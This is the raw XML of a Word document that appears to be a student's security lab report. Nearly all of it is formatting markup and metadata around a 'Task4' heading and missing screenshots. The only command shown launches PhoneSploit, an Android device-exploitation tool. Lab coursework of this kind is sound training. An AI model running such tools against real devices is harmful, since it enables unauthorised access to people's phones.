    <w:p w14:paraId="45C83ADA" w14:textId="2D8689D9" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="1D631CB5" w14:textId="7E50FB2E" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="03C11318" w14:textId="21062B1B" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="7089D878" w14:textId="72E9CEBE" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="0EAD3215" w14:textId="78E8CD8F" w:rsidR="002A23B1" w:rsidRDefault="002A23B1">
      <w:r>
        <w:t xml:space="preserve">Task4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622F158" w14:textId="58DF9C4C" w:rsidR="002A23B1" w:rsidRDefault="002A23B1">
      <w:r w:rsidRPr="002A23B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3041D48D" wp14:editId="2DE58302">
            <wp:extent cx="5760085" cy="192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EEC5" w14:textId="44CDD5FB" w:rsidR="002A23B1" w:rsidRDefault="002A23B1">
      <w:r w:rsidRPr="002A23B1">
        <w:t>python3 phonesploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD1D68" w14:textId="09A0C8D2" w:rsidR="002A23B1" w:rsidRDefault="002A23B1">
      <w:r w:rsidRPr="002A23B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31FA33EF" wp14:editId="34B30A56">
            <wp:extent cx="5760085" cy="3772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75C" w14:textId="77777777" w:rsidR="00353153" w:rsidRDefault="00353153"/>
    <w:sectPr w:rsidR="00353153" w:rsidSect="00394336">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1134" w:bottom="1440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C90"/>
    <w:rsid w:val="00055DA9"/>
    <w:rsid w:val="00063180"/>
    <w:rsid w:val="00065955"/>
    <w:rsid w:val="00097078"/>
    <w:rsid w:val="001172E4"/>
    <w:rsid w:val="001F4F0C"/>
    <w:rsid w:val="0022551E"/>
    <w:rsid w:val="00286291"/>
    <w:rsid w:val="00287F8A"/>
    <w:rsid w:val="002A23B1"/>
    <w:rsid w:val="00353153"/>
    <w:rsid w:val="00394336"/>
    <w:rsid w:val="003B3366"/>
    <w:rsid w:val="003F322F"/>
    <w:rsid w:val="00407E87"/>
    <w:rsid w:val="004273C6"/>
    <w:rsid w:val="004852C3"/>
    <w:rsid w:val="0054743F"/>
    <w:rsid w:val="005E6BC1"/>
    <w:rsid w:val="00634C90"/>
    <w:rsid w:val="006717F8"/>
    <w:rsid w:val="00682B36"/>
    <w:rsid w:val="00783071"/>
    <w:rsid w:val="007B3520"/>
    <w:rsid w:val="008D61EB"/>
    <w:rsid w:val="008E2727"/>
    <w:rsid w:val="00933794"/>
    <w:rsid w:val="0095123D"/>
    <w:rsid w:val="00A44E48"/>
    <w:rsid w:val="00AB661A"/>
    <w:rsid w:val="00B650C1"/>
    <w:rsid w:val="00B946FE"/>
    <w:rsid w:val="00CB6890"/>
    <w:rsid w:val="00D626F7"/>
    <w:rsid w:val="00D656ED"/>
    <w:rsid w:val="00DA62FE"/>
    <w:rsid w:val="00DF0B05"/>
    <w:rsid w:val="00EA09F6"/>
    <w:rsid w:val="00EC0958"/>
    <w:rsid w:val="00EE27B7"/>
    <w:rsid w:val="00F6138D"/>
    <w:rsid w:val="00FA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B4E9D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C6E42D1-0B81-4648-ABD7-570C7608A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15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Anh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hải Anh</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-07T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T08:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>